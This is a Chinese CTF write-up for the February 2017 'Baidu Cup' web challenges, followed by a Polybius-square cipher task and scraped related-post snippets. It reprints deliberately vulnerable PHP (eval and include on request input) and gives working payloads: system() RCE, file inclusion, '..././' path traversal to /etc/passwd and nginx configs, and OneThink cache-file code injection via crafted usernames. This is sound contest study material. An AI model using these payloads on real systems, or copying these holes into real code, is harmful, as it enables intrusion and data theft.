“百度杯”CTF比赛 2017 二月场 wp
目录
爆破-1
爆破-2
爆破-3
include
Zone
OneThink
misc 2 上古神器
爆破-1
flag在一个长度为6的变量里面
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>
$$a ,可以实现变量覆盖,
hello传入GLOBALS全局变量,$$a可以实现查看全部变量
爆破-2
flag不在变量中
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
变量配合var_dump好像可以直接rce了
姿势很多了
hello=system('tac flag,php')
hello=file('flag.php')
也可以直接
hello=hilight_file('flag.php')
hello=show_source('flag.php')
爆破-3
这个是真爆破
<?php
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){$_SESSION['nums'] = 0;$_SESSION['time'] = time();$_SESSION['whoami'] = 'ea';
}if($_SESSION['time']+120<time()){session_destroy();
}$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){$_SESSION['nums']++;$_SESSION['whoami'] = $str_rands;echo $str_rands;
}if($_SESSION['nums']>=10){echo $flag;
}show_source(__FILE__);
?>
代码审计
“百度杯”CTF比赛 2017 二月场--web 爆破-3 writeup_会下雪的晴天的博客-CSDN博客
说的也很清楚
- 设置变量nums为0;time为当前时间;whoami的值为:ea
- 120秒后结束回话
- 传入变量value的值
- 创建一个从 “a” 到 “z” 的数组$str_rand
- mt_rand()从0-25随机选取数字,整句话得到两个随机字母
- whoami需要等于value的前两位,并且value的md5值的第5为开始,长度为4的字符串==0
- 循环10次输出flag
md5直接那里直接用数组就可以绕过了
先传入ea,左上角会弹出新的随机字母,继续重复即可,手动的时间完全够
include
没错,就是文件包含漏洞
<?php
show_source(__FILE__);
if(isset($_REQUEST['path'])){include($_REQUEST['path']);
}else{include('phpinfo.php');
}
使用伪协议, hackbar经常有问题,直接用burp就行
Zone
网站要上线了,还没测试呢,怎么办?
“百度杯”CTF比赛 2017 二月场--Zone_FTOrange的博客-CSDN博客
直接原页面抓包进,修改login=1,然后出现了
这个页面继续抓包,修改login,响应头出现个location
跟着wp操作,尝试在这里访问系统目录 etc/passwd,用../穿越目录没出来,
禁用../的话用双写绕过..././ ,出来了
wp又说查看nginx的配置,(因为这题大概是nginx的漏洞)
查找配位文件的位置为/etc/nginx/nginx.conf
又是说最后一行包含了 sites-enabled/default ,去访问这个
autoindex on 表示打开目录浏览功能,因此可以进行目录遍历了
直接访问/online-movies. ./
还有一个细节,通过robots.txt,知道flag在flag.php里
OneThink
利用已知的漏洞拿shell吧。
OneThink1.0文件缓存漏洞分析及题目复现 - 安全客,安全资讯平台
这个文章讲了这个漏洞 ,直接学着用就行
注册页面 以 %0a$a=$_GET[a];# 作为用户名注册,并抓包 ,换行符和注释符都能绕过些东西
抓包后,对%0a进行URL解码,可以看到换行效果
然后放包,注册成功
接着注册用户名 %0asystem($a);# 看的出来是要配合rce的,过程同上
然后在按照次序登录这两个用户,过程也跟注册一样,成功登录
然后访问缓存页面 ,配合rce,这个a就是我们登录后的$a了
/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=ls
目录穿越
misc 2 上古神器
“波利比奥斯棋盘”
“3534315412244543_434145114215_132435231542”
这个没遇到过,积累一波 ,就是根据密文找对应坐标的字母
这网站不错棋盘密码在线加密解密 - 千千秀字
其他两个misc好无聊,不写了
“百度杯”CTF比赛 2017 二月场 wp相关推荐
- [Reverse] - 百度杯”CTF比赛 2017 二月场-CrackMe-1
环境:Windows XP 工具: IDA OD EXEINFOPE 0x00 查壳 0x01 分析 拖入OD,字符串查找看一看. 跟进去看就可以知道关键call了 0040196A . 48 dec ...
- “百度杯”CTF比赛 2017 二月场,题目名称:爆破-3
刚刚打开就看到404: 看了下网址,没毛病,于是转到index.php看看: 已经很清楚了,就是要在120秒内达成这个条件10次就能输出flag了 $ _SESSION['whoami']==( $ ...
- “百度杯”CTF比赛2017年2月场WP--web
一.爆破-1 在php语言中,所有的已经定义的变量都会保存在GLOBALS全局数组中,比方说你定义了一个$name="李华",那么$GLOBALS['name']就等于" ...
- 百度杯”CTF比赛(十一月场)
第一场 1.小可爱 解: 2.签到题 解:加群下载文件"flag.rar",打开时需要解密,输入给的key解出来 直接提交就可以了,这道题很喜欢.... 3.所以这是13点吗 解: ...
- “百度杯”CTF比赛 十一月场Look
最近一直在刷百度杯的题目,感觉每个题目都能涉及到很多知识点,写点wp记录一下 进入后看见页面空白,这个时候一般用dirsearch扫一下,同时burp抓包看一下 看到响应头里有X-HT,这应该是一个提 ...
- “百度杯”CTF比赛 十月场 writeup
"百度杯"CTF比赛十月场 Misc 那些年我追过的贝丝 我要变成一只程序员 剧情大反转 challenge 据说是rc4算法 try again 表姐家的签到题 泄露的数据 考眼 ...
- “百度杯”CTF比赛 九月场--web Upload
"百度杯"CTF比赛 九月场--web Upload 基础知识 1.什么是一句话木马? 2.一句话木马的简要原理 3.html渲染过程 解析渲染该过程主要分为以下步骤 解决方案 4 ...
- “百度杯”CTF比赛 十一月场Mangager
此题前半部分分析见"百度杯"CTF比赛 十一月场 题目名称:Mangager_CodeRoc的博客-CSDN博客 每日CTF Web:Mangager_LUV_YOUJUN的博客- ...
- [WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程
中华人民共和国网络安全法(出版物)_360百科 可以说一道经典的CTF题目,解这道题的过程类似于我们渗透测试的过程,所以把它放在了这个专栏,在这里我们详细讲过程,而不是原理. 目录 题目 寻找方向 f ...
最新文章
- 当CPU飙高时,它在做什么
- 数组拷贝问题的解决方法
- Group by优化
- ibm服务器虚拟化报价,IBM x86 服务器虚拟化服务.pdf
- python的内置对象有哪些、列举说明_Python内置对象汇总
- python 38day--CSS简介
- EAGLE layout 拼板方法
- ETL过程中数据清洗(脏数据处理)小结
- python处理wps表格数据匹配_wps2个excel表格数据匹配-Wps表格怎么自动匹配我需要的数值...
- 只有mdf文件恢复数据库
- [转]file_get_contents(php://input)
- Java实现Word转PDF【完整版】
- 使用服务器出现error:cannot connect to X server
- 人、机客户服务质量 - 实时透视分析
- java图形验证码去除干扰,使用python 对验证码图片进行降噪处理
- 交流纯电容电路中电容的容抗、容量和频率以及电压与电流的关系
- html移动轮播后盾网,后盾网lavarel视频项目---Vue项目使用vue-awesome-swiper轮播插件...
- javax和java的区别
- 深信服上网行为管理 准入规则库介绍
- Lotto POJ-2245